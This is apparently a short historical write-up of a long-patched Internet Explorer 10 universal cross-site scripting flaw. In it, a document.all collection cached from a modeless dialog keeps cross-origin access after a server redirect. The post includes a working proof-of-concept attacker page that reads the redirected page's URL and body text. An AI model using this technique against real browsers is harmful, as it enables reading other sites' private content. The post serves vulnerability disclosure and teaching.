IE10 UXSS: Caching document.all Collection Survives Server Redirect

I noticed that saving a reference to document.all from inside a modeless dialog, before the dialog’s page redirected to a different origin, preserved cross-origin access to the redirected document. After the redirect, the cached document.all collection still pointed to nodes whose ownerDocument was the cross-origin page, allowing its content to be read freely.

<!-- index.html (attacker page) -->
<script>
function main()
{
    var win = showModelessDialog("redirect.aspx", window, "dialogwidth=400px;dialogHeight=300px");

    var strCode =   'dialogArguments.cachedDocAll = document.all;' +
                    'alert("Please, don\'t close this alert yet");';
    win.setTimeout(strCode);
    setTimeout("useCachedDocAll()", 2000);
}

function useCachedDocAll()
{
    alert("Content coming from:  " + cachedDocAll[0].ownerDocument.URL + "\n\ndocument.body.innerText:\n" + cachedDocAll[0].ownerDocument.body.innerText);
}
</script>
<input type="button" onclick="main()" value="Do it!">

The dialog ran code that stored document.all into the opener’s cachedDocAll property. When the server redirect fired, the Same Origin Policy should have severed the connection — but cachedDocAll[0].ownerDocument still pointed at the post-redirect cross-origin document, and body.innerText exposed its content.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 UXSS: Caching Window Reference via HTC in Math Object Survives Redirect] :: [UXSS: Caching Modal External Object and Sharing document via returnValue] >